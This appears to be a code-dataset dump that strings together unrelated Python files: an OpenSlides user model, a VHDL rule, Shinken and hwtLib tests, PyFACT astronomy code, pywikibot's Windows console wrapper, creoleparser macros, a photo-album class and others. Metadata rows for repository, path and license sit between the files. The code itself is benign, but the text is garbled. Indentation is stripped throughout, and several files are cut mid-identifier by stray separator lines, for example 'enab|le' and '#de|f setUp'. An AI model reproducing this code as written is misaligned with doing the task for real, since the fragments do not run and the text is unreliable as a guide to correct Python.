# The user has a last_name and a first_name
if first_name and last_name:
name = " ".join((self.first_name, self.last_name))
# The user has only a first_name or a last_name or no name
else:
name = first_name or last_name or self.username
# Return result
return name
def save(self, *args, **kwargs):
"""
Overridden method to skip autoupdate if only last_login field was
updated as it is done during login.
"""
if kwargs.get("update_fields") == ["last_login"]:
kwargs["skip_autoupdate"] = True
return super().save(*args, **kwargs)
def has_perm(self, perm):
"""
This method is closed. Do not use it but use openslides.utils.auth.has_perm.
"""
raise RuntimeError(
"Do not use user.has_perm() but use openslides.utils.auth.has_perm"
)
def send_invitation_email(
self, connection, subject, message, skip_autoupdate=False
):
"""
Sends an invitation email to the users. Returns True on success, False on failiure.
May raise an ValidationError, if something went wrong.
"""
if not self.email:
return False
# Custom dict class that for formatstrings with entries like {not_existent}
# no error is raised and this is replaced with ''.
class format_dict(dict):
def __missing__(self, key):
return ""
message_format = format_dict(
{
"name": str(self),
"event_name": config["general_event_name"],
"url": c
|
jeremiah-c-leary/vhdl-style-guide
|
vsg/rules/signal/rule_008.py
|
Python
|
gpl-3.0
| 705
| 0.001418
|
from vsg.rules import token_prefix
from vsg import token
lTokens = []
lTokens.append(token.signal_declaration.identifier)
class rule_008(token_prefix):
'''
This rule checks for valid prefixes on signal identifiers.
Default signal prefix is *s\_*.
|configuring_prefix_and_suffix_rules_link|
**Violation**
.. code-block:: vhdl
signal wr_en : std_logic;
signal rd_en :
|
std_logic;
**Fix**
.. code-block:: vhdl
signal s_wr_en : std_logic;
signal s_rd_en : std_logic;
'''
def __init__(self):
token_prefix.__init__(self, 'signal', '
|
008', lTokens)
self.prefixes = ['s_']
self.solution = 'Signal identifiers'
|
xorpaul/shinken
|
test/test_parse_perfdata.py
|
Python
|
agpl-3.0
| 4,222
| 0.002842
|
#!/usr/bin/env python
# Copyright (C) 2009-2010:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
#
# This file is used to test reading and processing of config files
#
from shinken_test import *
from shinken.misc.perfdata import Metric, PerfDatas
class TestParsePerfdata(ShinkenTest):
# Uncomment this is you want to use a specific configuration
# for your test
#de
|
f setUp(self):
# self.setup_with_file('etc/nagios_parse_perfdata.cfg')
def test_parsing_perfdata(self):
s = 'ramused=1009MB;;;0;1982 swapused=540MB;;;0;3827 memused=1550MB;2973;3964;0;5810'
s = 'ramused=1009MB;;;0;1982'
m = Metric(s)
self.assert_(m.name == 'ramused')
self.assert_(m.value == 1009)
self.assert_(m.uom == 'MB')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
|
self.assert_(m.min == 0)
self.assert_(m.max == 1982)
s = 'ramused=90%;85;95;;'
m = Metric(s)
self.assert_(m.name == 'ramused')
self.assert_(m.value == 90)
self.assert_(m.uom == '%')
self.assert_(m.warning == 85)
self.assert_(m.critical == 95)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
s = 'ramused=1009MB;;;0;1982 swapused=540MB;;;; memused=90%'
p = PerfDatas(s)
p.metrics
m = p['swapused']
self.assert_(m.name == 'swapused')
self.assert_(m.value == 540)
self.assert_(m.uom == 'MB')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
self.assert_(m.min == None)
self.assert_(m.max == None)
m = p['memused']
self.assert_(m.name == 'memused')
self.assert_(m.value == 90)
self.assert_(m.uom == '%')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
self.assert_(len(p) == 3)
s = "'Physical Memory Used'=12085620736Bytes; 'Physical Memory Utilisation'=94%;80;90;"
p = PerfDatas(s)
p.metrics
m = p['Physical Memory Used']
self.assert_(m.name == 'Physical Memory Used')
self.assert_(m.value == 12085620736)
self.assert_(m.uom == 'Bytes')
self.assert_(m.warning is None)
self.assert_(m.critical is None)
self.assert_(m.min is None)
self.assert_(m.max is None)
m = p['Physical Memory Utilisation']
self.assert_(m.name == 'Physical Memory Utilisation')
self.assert_(m.value == 94)
self.assert_(m.uom == '%')
self.assert_(m.warning == 80)
self.assert_(m.critical == 90)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
s = "'C: Space'=35.07GB; 'C: Utilisation'=87.7%;90;95;"
p = PerfDatas(s)
p.metrics
m = p['C: Space']
self.assert_(m.name == 'C: Space')
self.assert_(m.value == 35.07)
self.assert_(m.uom == 'GB')
self.assert_(m.warning is None)
self.assert_(m.critical is None)
self.assert_(m.min is None)
self.assert_(m.max is None)
m = p['C: Utilisation']
self.assert_(m.name == 'C: Utilisation')
self.assert_(m.value == 87.7)
self.assert_(m.uom == '%')
self.assert_(m.warning == 90)
self.assert_(m.critical == 95)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
if __name__ == '__main__':
unittest.main()
|
mraue/pyfact
|
pyfact/map.py
|
Python
|
bsd-3-clause
| 11,616
| 0.008351
|
#===========================================================================
# Copyright (c) 2011-2012, the PyFACT developers
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the PyFACT developers nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE PYFACT DEVELOPERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===========================================================================
# Imports
import sys, time, logging, os, datetime, math
import numpy as np
import scipy.optimize
import scipy.special
import scipy.ndimage
import pyfits
import pyfact as pf
#===========================================================================
# Functions & classes
#---------------------------------------------------------------------------
class SkyCoord:
"""Sky coordinate in RA and Dec. All units should be degree."""
def __init__(self, ra, dec) :
"""
Sky coordinate in RA and Dec. All units should be degree.
In the current implementation it should also work with arrays, though one has to be careful in dist.
Parameters
----------
ra : float/array
Right ascension of the coordinate.
dec : float/array
Declination of the coordinate.
"""
self.ra, self.dec = ra, dec
def dist(self, c) :
"""
Return the distance of the coordinates in degree following the haversine formula,
see e.g. http://en.wikipedia.org/wiki/Great-circle_distance.
Parameters
----------
c : SkyCoord
Returns
-------
distance : float
Return the distance of the coordinates in degree following the haversine formula.
Notes
-----
http://en.wikipedia.org/wiki/Great-circle_distance
"""
return 2. * np.arcsin(np.sqrt(np.sin((self.dec - c.dec) / 360. * np.pi) ** 2.
+ np.cos(self.dec / 180. * np.pi) * np.cos(c.dec / 180. * np.pi)\
* np.sin((self.ra - c.ra) / 360. * np.pi) ** 2.)) / np.pi * 180.
#---------------------------------------------------------------------------
class SkyCircle:
"""A circle on the sky."""
def __init__(self, c, r) :
"""
A circle on the sky.
Parameters
----------
coord : SkyCoord
Coordinates of the circle center (RA, Dec)
r : float
Radius of the circle (deg).
"""
self.c, self.r = c, r
def contains(self, c) :
"""
Checks if the coordinate lies inside the circle.
Parameters
----------
c : SkyCoord
Returns
-------
contains : bool
True if c lies in the SkyCircle.
"""
return self.c.dist(c) <= self.r
def intersects(self, sc) :
"""
Checks if two sky circles overlap.
Parameters
----------
sc : SkyCircle
"""
return self.c.dist(sc.c) <= self.r + sc.r
#---------------------------------------------------------------------------
def skycircle_from_str(cstr) :
"""Creates SkyCircle from circle region string."""
x, y, r = eval(cstr.upper().replace('CIRCLE', ''))
return SkyCircle(SkyCoord(x, y), r)
#---------------------------------------------------------------------------
def get_cam_acc(camdist, rmax=4., nbins=None, exreg=None, fit=False, fitfunc=None, p0=None) :
"""
Calculates the camera acceptance histogram from a given list with camera distances (event list).
Parameters
----------
camdist : array
Numpy array of camera distances (event list).
rmax : float, optional
Maximum radius for the acceptance histogram.
nbins : int, optional
Number of bins for the acceptance histogram (default = 0.1 deg).
exreg : array, optional
Array of exclusion regions. Exclusion regions are given by an aray of size 2
[r, d] with r = radius, d = distance
|
to camera center
fit : bool, optional
|
Fit acceptance histogram (default=False).
"""
if not nbins :
nbins = int(rmax / .1)
# Create camera distance histogram
n, bins = np.histogram(camdist, bins=nbins, range=[0., rmax])
nerr = np.sqrt(n)
# Bin center array
r = (bins[1:] + bins[:-1]) / 2.
# Bin area (ring) array
r_a = (bins[1:] ** 2. - bins[:-1] ** 2.) * np.pi
# Deal with exclusion regions
ex_a = None
if exreg :
ex_a = np.zeros(len(r))
t = np.ones(len(r))
for reg in exreg :
ex_a += (pf.circle_circle_intersection_a(bins[1:], t * reg[0], t * reg[1])
- pf.circle_circle_intersection_a(bins[:-1], t * reg[0], t * reg[1]))
ex_a /= r_a
# Fit the data
fitter = None
if fit :
#fitfunc = lambda p, x: p[0] * x ** p[1] * (1. + (x / p[2]) ** p[3]) ** ((p[1] + p[4]) / p[3])
if not fitfunc :
fitfunc = lambda p, x: p[0] * x ** 0. * (1. + (x / p[1]) ** p[2]) ** ((0. + p[3]) / p[2])
#fitfunc = lambda p, x: p[0] * x ** 0. * (1. + (x / p[1]) ** p[2]) ** ((0. + p[3]) / p[2]) + p[4] / (np.exp(p[5] * (x - p[6])) + 1.)
if not p0 :
p0 = [n[0] / r_a[0], 1.5, 3., -5.] # Initial guess for the parameters
#p0 = [.5 * n[0] / r_a[0], 1.5, 3., -5., .5 * n[0] / r_a[0], 100., .5] # Initial guess for the parameters
fitter = pf.ChisquareFitter(fitfunc)
m = (n > 0.) * (nerr > 0.) * (r_a != 0.) * ((1. - ex_a) != 0.)
if np.sum(m) <= len(p0) :
logging.error('Could not fit camera acceptance (dof={0}, bins={1})'.format(len(p0), np.sum(m)))
else :
# ok, this _should_ be improved !!!
x, y, yerr = r[m], n[m] / r_a[m] / (1. - ex_a[m]) , nerr[m] / r_a[m] / (1. - ex_a[m])
m = np.isfinite(x) * np.isfinite(y) * np.isfinite(yerr) * (yerr != 0.)
if np.sum(m) <= len(p0) :
logging.error('Could not fit camera acceptance (dof={0}, bins={1})'.format(len(p0), np.sum(m)))
else :
fitter.fit_data(p0, x[m], y[m], yerr[m])
return (n, bins, nerr, r, r_a, ex_a, fitter)
#---------------------------------------------------------------------------
def get_sky_mask_circle(r, bin_size) :
"""
Returns a 2d numpy histogram with (2. * r / bin_size) bins per axis
where a circle of radius has bins filled 1.s, all other bins are 0.
Parameters
----------
r : float
Radius of the circle.
bin_size : float
Physical size of the bin, same units as rmin, rmax.
Returns
-------
sky_mask : 2d numpy array
Returns a 2d numpy histogram with (2. * r / bin_size) bins per axis
where a circle of radius has bins filled 1.s, al
|
scampion/pimpy
|
pimpy/video/features/surf.py
|
Python
|
agpl-3.0
| 2,428
| 0.011532
|
"""
pimpy.video.features.surf : enab
|
le to compute a video signature
.. module:: surf
:synopsis: Tools for video
:platform: Unix, Mac, Windows
.. moduleauthor:: Sebastien Campion <sebastien.campion@inria.fr>
"""
# pimpy
# Copyright (C) 2010 Sebastien Campion <sebastien.campion@inria.fr>
#
#
|
pimpy is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pimpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pimpy; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
from feature import Feature
import numpy,logging
from pimpy.video.decoder import decoder
class Surf(Feature):
u"""
A SURFs descriptors provided by OpenCV
:param name: sigsize input signature size default 64
:type name: int
"""
log = logging.getLogger('pimpy.video.features.surf')
description = __doc__
def __init__(self,**kwargs):
u"""
compute video signature based on dct descriptor
"""
Feature.__init__(self,**kwargs)
def _callback(self,frame):
k,d = frame.get_feature("surf")
self.avfs["keypoints"].write(k)
self.avfs["vectors"].write(d)
def get(self,video):
"""
return array of [keypoints,descriptors] for each video frame
:rtype: numpy.array
"""
self.avfs = video.hdf5.get_avfeature_set("visual",self.name)
if not self.avfs :
desc_dataset = (("keypoints",6,numpy.float),
("vectors",64,numpy.float))
self.avfs = video.hdf5.create_avfeature_set("visual",
self.name,
desc_dataset)
d = decoder(video)
d.decode_qcif_gray(self._callback)
print self.avfs.keys()
return (self.avfs['keypoints'].read(),
self.avfs['vectors'].read())
|
wintermind/pypedal
|
PyPedal/examples/new_graphics3.py
|
Python
|
gpl-2.0
| 1,123
| 0.007124
|
#!/usr/bin/python
######################################################
|
#########################
# NAME: new_graphics3.py
# VERSION: 2.0.0b15 (18SEPTEMBER2006)
# AUTHOR: John B. Cole, PhD (jcole@aipl.arsusda.gov)
# LICENSE: LGPL
##############
|
#################################################################
from PyPedal import pyp_demog
from PyPedal import pyp_graphics
from PyPedal import pyp_jbc
from PyPedal import pyp_newclasses
from PyPedal import pyp_nrm
from PyPedal import pyp_metrics
from PyPedal.pyp_utils import pyp_nice_time
if __name__ == '__main__':
print 'Starting pypedal.py at %s' % (pyp_nice_time())
example = pyp_newclasses.loadPedigree(optionsfile='new_graphics3.ini')
if example.kw['messages'] == 'verbose':
print '[INFO]: Calling pyp_graphics.new_draw_pedigree() at %s' % (pyp_nice_time())
pyp_graphics.new_draw_pedigree(example, gfilename='graphics3', gtitle='graphics3 pedigree', gorient='p')
pyp_jbc.color_pedigree(example,gfilename='graphics3', ghatch='0', \
metric='sons', gtitle='Nodes are colored by number of sons.', \
gprog='dot', gname=1)
|
davrv93/creed-en-sus-profetas-backend
|
django_rv_apps/apps/believe_his_prophets_api/views/spirit_prophecy_chapter_language/filters.py
|
Python
|
apache-2.0
| 1,155
| 0.013853
|
import django_filters
from django_filters import rest_framework as filters
from django_rv_apps.apps.believe_his_prophets.models.spirit_prophecy_chapter import SpiritProphecyChapter, SpiritProphecyChapterLanguage
from django_rv_apps.apps.believe_his_prophets.models.spirit_prophecy import SpiritProphecy
from django_rv_apps.apps.believe_his_prophets.models.language import Language
from django.utils import timezone
class SpiritProphecyChapterLanguageFilter(django_filters.FilterSet):
code_iso = filters.Model
|
MultipleChoiceFilter(
queryset=Language.objects.all(),
field_name='language__code_iso',
to_field_name='code_iso'
)
start_date = filters.CharFilter(method='filter_date')
class Meta:
model = SpiritProphecyChapterLanguage
fields = ('id' ,'code_iso','start_date')
def filter_date(self, queryset, name, value):
t = timezone.localtime(timezone.now())
|
return queryset.filter(
spirit_prophecy_chapter__start_date__year = t.year,
spirit_prophecy_chapter__start_date__month = t.month, spirit_prophecy_chapter__start_date__day = t.day,
)
|
icyflame/batman
|
pywikibot/userinterfaces/win32_unicode.py
|
Python
|
mit
| 12,438
| 0.001769
|
# -*- coding: utf-8 -*-
"""Stdout, stderr and argv support for unicode."""
##############################################
# Support for unicode in windows cmd.exe
# Posted on Stack Overflow [1], available under CC-BY-SA 3.0 [2]
#
# Question: "Windows cmd encoding change causes Python crash" [3] by Alex [4],
# Answered [5] by David-Sarah Hopwood [6].
#
# [1] https://stackoverflow.com
# [2] https://creativecommons.org/licenses/by-sa/3.0/
# [3] https://stackoverflow.com/questions/878972
# [4] https://stackoverflow.com/users/85185
# [5] https://stackoverflow.com/a/3259271/118671
# [6] https://stackoverflow.com/users/393146
#
################################################
#
# stdin support added by Merlijn van Deen <valhallasw@gmail.com>, March 2012
# Licensed under both CC-BY-SA and the MIT license.
#
################################################
from __future__ import absolute_import, print_function, unicode_literals
from io import UnsupportedOperation
import sys
stdin = sys.stdin
stdout = sys.stdout
stderr = sys.stderr
argv = sys.argv
if sys.version_info[0] > 2:
unicode = str
PY3 = True
else:
PY3 = False
if sys.platform == "win32":
import codecs
from ctypes import WINFUNCTYPE, windll, POINTER
from ctypes import byref, c_int, create_unicode_buffer
from ctypes.wintypes import BOOL, HANDLE, DWORD, LPWSTR, LPCWSTR
try:
from ctypes.wintypes import LPVOID
except ImportError:
from ctypes import c_void_p as LPVOID
original_stderr = sys.stderr
# If any exception occurs in this code, we'll probably try to print it on stderr,
# which makes for frustrating debugging if stderr is directed to our wrapper.
# So be paranoid about catching errors and reporting them to original_stderr,
# so that we can at least see them.
def _complain(message):
print(isinstance(message, str) and message or repr(message), file=original_stderr)
# Work around <http://bugs.python.org/issue6058>.
codecs.register(lambda name: name == 'cp65001' and codecs.lookup('utf-8') or None)
# Make Unicode console output work independently of the current code page.
# This also fixes <http://bugs.python.org/issue1602>.
# Credit to Michael Kaplan <http://blogs.msdn.com/b/michkap/archive/2010/04/07/9989346.aspx>
# and TZOmegaTZIOY
# <https://stackoverflow.com/questions/878972/windows-cmd-encoding-change-causes-python-crash/1432462#1432462>.
try:
# <https://msdn.microsoft.com/en-us/library/ms683231(VS.85).aspx>
# HANDLE WINAPI GetStdHandle(DWORD nStdHandle);
# returns INVALID_HANDLE_VALUE, NULL, or a valid handle
#
# <https://msdn.microsoft.com/en-us/library/aa364960(VS.85).aspx>
# DWORD WINAPI GetFileType(DWORD hFile);
#
# <https://msdn.microsoft.com/en-us/library/ms683167(VS.85).aspx>
# BOOL WINAPI GetConsoleMode(HANDLE hConsole, LPDWORD lpMode);
GetStdHandle = WINFUNCTYPE(HANDLE, DWORD)(("GetStdHandle", windll.kernel32))
STD_INPUT_HANDLE = DWORD(-10)
STD_OUTPUT_HANDLE = DWORD(-11)
STD_ERROR_HANDLE = DWORD(-12)
GetFileType = WINFUNCTYPE(DWORD, DWORD)(("GetFileType", windll.kernel32))
FILE_TYPE_CHAR = 0x0002
FILE_TYPE_REMOTE = 0x8000
GetConsoleMode = (WINFUNCTYPE(BOOL, HANDLE, POINTER(DWORD))
(("GetConsoleMode", windll.kernel32)))
INVALID_HANDLE_VALUE = DWORD(-1).value
def not_a_console(handle):
"""Return whether the handle is not to a console."""
if handle == INVALID_HANDLE_VALUE or handle is Non
|
e:
return True
return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR or
GetConsoleMode(handle, byref(DWORD())) == 0)
def old_fileno(std_name):
"""Return the fileno or None if that doesn't work."""
# some environments like IDLE don't support the fileno operation
# handle those like std streams which don't have fileno at all
std = getattr(sys
|
, 'std{0}'.format(std_name))
if hasattr(std, 'fileno'):
try:
return std.fileno()
except UnsupportedOperation:
pass
old_stdin_fileno = old_fileno('in')
old_stdout_fileno = old_fileno('out')
old_stderr_fileno = old_fileno('err')
STDIN_FILENO = 0
STDOUT_FILENO = 1
STDERR_FILENO = 2
real_stdin = (old_stdin_fileno == STDIN_FILENO)
real_stdout = (old_stdout_fileno == STDOUT_FILENO)
real_stderr = (old_stderr_fileno == STDERR_FILENO)
if real_stdin:
hStdin = GetStdHandle(STD_INPUT_HANDLE)
if not_a_console(hStdin):
real_stdin = False
if real_stdout:
hStdout = GetStdHandle(STD_OUTPUT_HANDLE)
if not_a_console(hStdout):
real_stdout = False
if real_stderr:
hStderr = GetStdHandle(STD_ERROR_HANDLE)
if not_a_console(hStderr):
real_stderr = False
if real_stdin:
ReadConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPVOID, DWORD, POINTER(DWORD),
LPVOID)(("ReadConsoleW", windll.kernel32))
class UnicodeInput:
"""Unicode terminal input class."""
def __init__(self, hConsole, name, bufsize=1024):
"""Initialize the input stream."""
self._hConsole = hConsole
self.bufsize = bufsize
self.buffer = create_unicode_buffer(bufsize)
self.name = name
self.encoding = 'utf-8'
def readline(self):
"""Read one line from the input."""
maxnum = DWORD(self.bufsize - 1)
numrecv = DWORD(0)
result = ReadConsoleW(self._hConsole, self.buffer, maxnum, byref(numrecv), None)
if not result:
raise Exception("stdin failure")
data = self.buffer.value[:numrecv.value]
if not PY3:
return data.encode(self.encoding)
else:
return data
if real_stdout or real_stderr:
# BOOL WINAPI WriteConsoleW(HANDLE hOutput, LPWSTR lpBuffer, DWORD nChars,
# LPDWORD lpCharsWritten, LPVOID lpReserved);
WriteConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD),
LPVOID)(("WriteConsoleW", windll.kernel32))
class UnicodeOutput:
"""Unicode terminal output class."""
def __init__(self, hConsole, stream, fileno, name):
"""Initialize the output stream."""
self._hConsole = hConsole
self._stream = stream
self._fileno = fileno
self.closed = False
self.softspace = False
self.mode = 'w'
self.encoding = 'utf-8'
self.name = name
self.flush()
def isatty(self):
"""Return whether it's a tty."""
return False
def close(self):
"""Set the stream to be closed."""
# don't really close the handle, that would only cause problems
self.closed = True
def fileno(self):
"""Return the fileno."""
return self._fileno
def flush(self):
"""Flush the stream."""
if self._hConsole is None:
try:
self._stream.flush()
except Exception as e:
_complain("%s.flush: %r from %r"
% (self.name, e, self._stream))
r
|
hprid/creoleparser
|
creoleparser/test_cheat_sheet_plus.py
|
Python
|
mit
| 2,923
| 0.021895
|
"""The macros below aren't reliable (e.g., some fail if ``arg_string`` is `None`)
or safe (``include`` doesn't guard against circular reference). For a more complete example, see
`the code used in the sandbox <http://code.google.com/p/urlminer/source/browse/examples/wiki/macros.py>`_.
"""
import genshi.builder as bldr
import dialects, core
import os
class Page(object):
root = 'test_pages'
def __init__(self,page_name):
self.name = page_name
def get_raw_body(self):
try:
f = open(os.path.join(self.root,self.name + '.txt'),'r')
s = f.read()
f.close()
return s
except IOError:
return None
def exists(self):
try:
f = open(os.path.join(self.root,self.name + '.txt'),'r')
f.close()
return True
except IOError:
return False
def class_func(page_name):
if not Page(page_name).exists():
return 'nonexistent'
def path_func(page_name):
if page_name == 'Home':
return 'FrontPage'
else:
return page_name
## Start of macros
def include(arg_string,body,isblock):
page = Page(arg_string.strip())
return text2html.generate(page.get_raw_body())
def include_raw(arg_string,body,isblock):
page = Page(arg_string.strip())
return bldr.tag.pre(page.get_raw_body(),class_='plain')
def include_source(arg_string,body,isblock):
page = Page(arg_string.strip())
return bldr.tag.pre(text2html.render(page.get_raw_body()))
|
def source(arg_string,body,isblock):
return bldr.tag.pre(text2html.render(body))
def pre(arg_string,body,isblock):
return bldr.tag.pre(body)
## End of macros
macros = {'include':include,
'include-raw':include_raw,
'include-source':include_source,
'source':source,
|
'pre':pre
}
def macro_dispatcher(macro_name,arg_string,body,isblock,environ):
if macro_name in macros:
return macros[macro_name](arg_string,body,isblock)
dialect = dialects.create_dialect(dialects.creole11_base,
wiki_links_base_url='',
wiki_links_space_char='',
# use_additions=True,
no_wiki_monospace=False,
wiki_links_class_func=class_func,
wiki_links_path_func=path_func,
macro_func=macro_dispatcher)
text2html = core.Parser(dialect)
if __name__ == '__main__':
text = Page('CheatSheetPlus').get_raw_body()
f = open(os.path.join('test_pages','CheatSheetPlus.html'),'r')
rendered = f.read()
f.close()
f = open(os.path.join('test_pages','template.html'),'r')
template = f.read()
f.close()
out = open(os.path.join('test_pages','out.html'),'w')
out.write(template % text2html(text))
out.close()
assert template % text2html(text) == rendered
|
Nic30/hwtLib
|
hwtLib/tests/synthesizer/astNodeIoReplacing_test.py
|
Python
|
mit
| 2,912
| 0.008242
|
import unittest
from hwt.code import If, Switch
from hwt.synthesizer.rtlLevel.netlist import RtlNetlist
class AstNodeIoReplacingTC(unittest.TestCase):
def sigs_by_n(self, n):
nl = RtlNetlist()
sigs = [nl.sig(chr(ord("a") + i)) for i in range(n)]
for s in sigs:
s.hidden = False
return nl, sigs
def test_If_simple_replace_input(self):
_, (a, b, c) = self.sigs_by_
|
n(3)
stm = \
If(a,
b(1)
).Else(
b(0)
)
stm._replace_input(a, c)
stm_ref = If(c,
b(1)
).Else(
b(0)
)
self.ass
|
ertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertEqual(a.endpoints, [])
self.assertEqual(c.endpoints, [stm, stm_ref])
def test_If_elif_replace_input(self):
_, (a, b, c, d) = self.sigs_by_n(4)
stm = \
If(a,
b(1)
).Elif(c & a,
b(0)
).Else(
c(0)
)
stm._replace_input(a, d)
stm_ref = If(d,
b(1)
).Elif(c & d,
b(0)
).Else(
c(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertEqual(a.endpoints, [a._isOn().singleDriver()])
self.assertEqual(c.endpoints, [(c & a).singleDriver(),
(c & d).singleDriver()])
def test_If_nested(self):
_, (a, b, c) = self.sigs_by_n(3)
stm = \
If(a,
If(c,
b(c & a)
).Else(
b(c | a)
)
).Else(
b(0)
)
stm._replace_input(a, c)
stm_ref = \
If(c,
If(c,
b(c)
).Else(
b(c)
)
).Else(
b(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertNotIn(stm, a.endpoints)
self.assertIn(stm, c.endpoints)
def test_Switch_simple(self):
_, (a, b, c) = self.sigs_by_n(3)
stm = \
Switch(a)\
.Case(0,
b(1)
).Default(
b(0)
)
stm._replace_input(a, c)
stm_ref = \
Switch(c)\
.Case(0,
b(1)
).Default(
b(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertNotIn(stm, a.endpoints)
self.assertIn(stm, c.endpoints)
if __name__ == '__main__':
import sys
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(AstNodeIoReplacingTC))
# suite.addTest(AstNodeIoReplacingTC("test_If_elif_replace_input"))
runner = unittest.TextTestRunner(verbosity=3)
sys.exit(not runner.run(suite).wasSuccessful())
|
severus21/LiPyc
|
src/Album.py
|
Python
|
apache-2.0
| 4,909
| 0.020371
|
from PIL import Image
import os.path,os
#import pickle
#import sqlite3
import hashlib
import time
import random
import logging
import copy
import threading
import itertools
from math import ceil
from enum import Enum
from copy import deepcopy
import itertools
from lipyc.utility import recursion_protect
from lipyc.Version import Versionned
from lipyc.config import *
from lipyc.utility import check_ext, make_thumbnail
from tkinter import messagebox
class Album(Versionned): #subalbums not fully implemented
def __init__(self, id, scheduler, name=None, datetime=None):
super().__init__()
self.scheduler = scheduler
self.id = id
self.name = name
self.datetime = datetime if datetime else time.mktim
|
e(time.gmtime())
self.subalbums = set()
self.thumbnail = None
self.files = set() #order by id
self.inner_keys = [] #use for inner albums
def __deepcopy__(self, memo):
new = Album(self.id, self.scheduler, self.name
|
, self.datetime)
new.subalbums = deepcopy(self.subalbums)
new.thumbnail = deepcopy(self.thumbnail)
new.files = deepcopy(self.files)
new.inner_keys = deepcopy(self.inner_keys)
return new
#for copy_to,add_to,move_to
def clone(self, new_id):
alb = self.__deepcopy__(None)
alb.inner_keys.clear()
alb.id = new_id
return alb
def pseudo_clone(self):
new = Album(self.id, self.scheduler, self.name, self.datetime)
if self.thumbnail:
self.scheduler.duplicate(self.thumbnail)
new.subalbums = self.subalbums
new.thumbnail = self.thumbnail
new.files = self.files
return new
def sql(self):
return (self.id, self.name, self.datetime,
'|'.join( [ str(alb.id) for alb in self.subalbums] ), self.thumbnail,
'|'.join( [ str(afile.id) for afile in self.files] ),
'|'.join(self.inner_keys) )
def rename(self, name):
self.name = name
def add_file(self, _file):
self.files.add(_file)
if self.thumbnail == None and _file.thumbnail :
self.thumbnail = self.scheduler.duplicate_file( _file.thumbnail )
def remove_file(self, _file):
self.files.discard(_file)
@recursion_protect()
def remove_all(self):
for album in list(self.subalbums):
album.remove_all()
self.subalbums.clear()
for _file in list(self.files):
self.remove_file(_file)
self.files.clear()
def add_subalbum(self, album):
self.subalbums.add( album )
def remove_subalbum(self, album):
if album in self.subalbums:
if album.thumbnail :
self.scheduler.remove_file( album.thumbnail )
self.subalbums.discard( album )
@recursion_protect()
def export_to(self, path):
location = os.path.join(path, self.name)
if not os.path.isdir(location):
os.makedirs( location )
for _file in self.files:
_file.export_to(location)
for album in self.subalbums:
album.export_to( location )
@recursion_protect()
def lock_files(self):
for _file in self.files:
_file.io_lock.acquire()
for album in self.subalbums:
album.lock_files()
def set_thumbnail(self, location):
if self.thumbnail :
self.scheduler.remove_file(self.thumbnail)
if not isinstance(location, str) or check_ext(location, img_exts): #fichier ouvert
self.thumbnail = make_thumbnail(self.scheduler, location )
else:
self.thumbnail = self.scheduler.add_file(location_album_default) #size and md5 ought to be combute once for all
def deep_files(self):
tmp = itertools.chain.from_iterable(map(Album.deep_files, self.subalbums))
return itertools.chain( self.files, tmp)
@recursion_protect(0)
def __len__(self): #number of file in dir and subdir
return len(self.files) + sum( [len(a) for a in self.subalbums ] )
@recursion_protect(0)
def all_albums(self):
return itertools.chain( [self], *list(map( lambda x:x.all_albums(), self.subalbums )) )
@recursion_protect(0)
def all_files(self):
return set(itertools.chain( *list(map(lambda x:x.files, self.all_albums()))))
@recursion_protect(0)
def duplicate(self):
if self.thumbnail:
